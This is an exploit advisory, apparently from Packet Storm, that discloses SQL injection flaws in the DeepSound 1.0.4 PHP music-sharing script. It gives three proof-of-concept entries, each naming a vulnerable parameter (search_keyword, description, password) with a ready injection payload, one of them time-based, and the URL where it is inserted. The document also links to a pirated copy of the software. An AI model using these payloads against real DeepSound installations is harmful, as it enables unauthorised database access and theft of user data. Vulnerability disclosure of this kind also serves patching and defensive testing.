DeepSound version 1.0.4 suffers from a remote SQL injection vulnerability.
2f2409b90024327c13fd2c191a2431206f338c384bdcd0671b6c811d7e715a05===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
# POST Method :
http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
--%20
# POST Method : http://localhost/Script/admin?id=&description=[TEXT
INPUT]2350265[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
# POST Method :
http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
Inject Here]
===========================================================================================
###########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed